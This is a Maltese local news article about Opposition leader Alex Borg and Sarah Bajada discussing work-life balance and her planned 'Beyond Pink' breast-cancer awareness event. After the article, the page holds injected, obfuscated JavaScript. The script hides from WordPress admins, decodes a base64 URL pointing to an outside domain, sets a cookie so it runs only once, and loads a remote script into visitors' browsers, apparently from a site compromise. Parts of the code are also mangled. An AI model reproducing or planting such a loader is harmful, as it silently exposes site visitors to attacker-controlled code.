Lokali

“Il-bilanċ bejn il-ħajja u l-familja kien determinanti għalina” – Alex Borg u Sarah Bajada

“Sarah hija determinanti għalija li fiha nsib spalla soda għat-traġit li qbadna.”

Sostna dan il-Kap tal-Partit Nazzjonalista Alex Borg f’intervista li saritlu matul ix-xandira tal-Ħadd filgħaxija hekk kif flimkien ma’ Sarah Bajada spjega kif fl-aħħar xhur ħajjithom inevitabbilment inbidlet ta’ taħt fuq.

Madanakollu b’determinazzjoni u bilanċ qed jirnexxielhom ilaħqu ma’ affarijiet kemm ta’ partit kif ukoll tal-ħajja ta’ kuljum hekk kif xorta waħda huma koppja bħall-oħrajn.

Alex Borg saħaq li s’intendi ħajja ta’ Kap tal-Oppożizzjoni mhux normali fejn m’għandekx skeda iżda xorta waħda jrid isib mod kif isib ħin għal qraba tiegħu.

Huma saħqu kif iħossuhom xortihom tajba li flimkien qed jaqsmu din l-esperjenza mimlija emozzjonijiet u flimkien ikunu ta’ bastun għal xulxin.

Il-Kap tal-Partit Nazzjonalista saħaq li fil-ħajja dejjem ikun hemm l-ostakli iżda flimkien jingħeleb kull ostaklu li jkun hemm quddiemek, b’determinazzjoni, lealtà u rispett – filwaqt li għal darb’oħra rringrazzja lil Sarah Bajada tas-sapport u sostenn kontinwu li jsib minn għandha.

Intant, Sarah Bajada spjegat li nhar l-24 ta’ Ottubru se tkun qed torganizza l-ewwel attività bit-tema Beyond Pink proprju b’rabta għal Pink October.

Hija saħqet li l-għan min din l-attività se jkun li n-nisa jkunu konxji ta’ saħħithom u jisimgħu esperjenzi ta’ min ġarrab.

(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();